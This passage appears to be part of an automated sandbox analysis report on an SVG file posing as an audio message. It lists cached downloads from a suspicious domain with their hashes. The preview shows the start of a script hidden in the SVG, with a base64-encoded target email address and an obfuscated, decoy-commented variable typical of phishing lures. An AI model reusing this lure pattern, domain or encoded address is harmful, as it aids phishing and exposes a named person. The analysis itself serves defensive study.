                                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/GDSherpa-bold.woff2
                                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.

                                                    Chrome Cache Entry: 99

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):268
                                                    Entropy (8bit):5.111190711619041
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:59759B80E24A89C8CD029B14700E646D
                                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://gt.prjnyvhqq.es/opaoRhBjUgHiIoaCKfIezzzWoVkJqtK30HJghd3t16wd98Kwq3Lsex6f6R62cd197
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

                                                    Static File Info

                                                    General

                                                    File type:SVG Scalable Vector Graphics image
                                                    Entropy (8bit):5.661310510324669
                                                    TrID:
                                                    • Scalable Vector Graphics (18501/1) 78.71%
                                                    • Generic XML (ASCII) (5005/1) 21.29%
                                                    File name:Qvc_Audio-Play.0044.svg
                                                    File size:1'410 bytes
                                                    MD5:67c678365ee489ae7ac08702cb85eb77
                                                    SHA1:c2a9a2ddc041f6c604f313a13eaf84af708583b0
                                                    SHA256:537e30c9807fc62a726c490d6cdeed931151b9c482b0c6239cf440b9538a81cb
                                                    SHA512:76b4185dee08c38672027914aec61335151d8cb61acf4588ca250c6023093193339ff529a407f7a1c511d1b1eca6550cc32e04403d3b196d8cd4660691a2fd03
                                                    SSDEEP:24:2dtkOoVqac6BDvcucVK6XE7MchJ3gPKwd8mZMYrDyPVuJsXw8aOUZOeudnlCMU:ck069oK8sBNwhZVD8QtZwU
                                                    TLSH:872163A672403B205EB30AA109BF41CCFE334612D219A7C5F84C98874FA2AC940CD6DD
                                                    File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">..<script>..<![CDATA[..LGSOJ = "$bWljaGFlbC5kdW5uZUBxdmMuY29t";.. /* The artist captured the essence of the subject. */..const cgTize

                                                    File Icon

                                                    Icon Hash:173149cccc490307